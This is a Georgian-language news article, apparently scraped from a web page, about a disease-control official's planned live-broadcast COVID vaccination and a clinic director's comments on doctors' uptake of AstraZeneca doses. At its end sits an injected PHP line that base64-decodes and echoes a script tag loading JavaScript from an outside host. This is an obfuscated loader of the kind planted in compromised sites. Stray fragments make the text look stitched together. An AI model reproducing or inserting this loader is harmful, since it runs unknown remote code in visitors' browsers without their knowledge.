celsiusi
ავერსი შნაიდერი
ხვალ, დაავადებათა კონტროლის ეროვნული ცენტრის ხელმძღვანელის მოადგილე პაატა იმნაძე დემონსტრაციულად, ღია ეთერში კოვიდის საწინააღმდეგო ვაქცინით აიცრება.
 
ამის შესახებ ინფექციური პათოლოგიის, შიდსის და კლინიკური იმუნოლოგიის ცენტრის გენერალურმა დირექტორმა თენგიზ ცერცვაძემ ჟურნალისტებს განუცხადა, რომლის ინფორმაციით, ეს 09:00 საათზე მათ დაწესებულებაში მოხდება, რითაც ხაზი გაესმება, რომ აღნიშნული კლინიკა იყო ფლაგმანი კოვიდთან ბრძოლაში.
 
ცერცვაძის მონაცემებით, ვაქცინაციის მიზნით, გუშინ, მათ დაწესებულებაში 150 ექიმი დარეგისტრირდა. ცერცვაძე დარწმუნებულია, რომ “ასტრაზენეკას“ 43 000 დოზა ორ კვირაში დაიხარჯება და მისი დასაწყობება საჭირო არ გახდება.
 
“ხომ იცით, აკრძალული ხილი უფრო სასურველია - როცა ვაქცინა ხელმისაწვდომი არ იყო, ყველას უნდოდა, ყველა ითხოვდა და საყვედურობდა. მას შემდეგ რაც ცნობილი გახდა, რომ ვაქცინა შემოვიდა, ეს ენთუზიაზმი შენელდა. ექიმების მხრიდან გამოითქმება მზადყოფნა, მაგრამ არიან ისეთებიც, ვინც ფიქრობს, რომ ჯერ მოიცადონ, დაელოდონ შედეგებს, ნახონ რამდენად უსაფრთხო იქნება და შემდეგ აიცრან. საბედნიეროდ, არ არის დიდი რაოდენობა - ასეთი ნახევარზე ნაკლებია. ექიმების ნახევარზე მეტი აიცრებიან და მზად არიან, ყოველგვარი აგიტაცია-პროპაგანდის გარეშე აიცრან. ინტენსიურად რეგისტრირდებიან. ასევე აიცრებიან მოხუცთა თავშესაფრებში მცხოვრები ხანდაზმულები“, - განაცხადა თენგიზ ცერცვაძემ.
1295
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");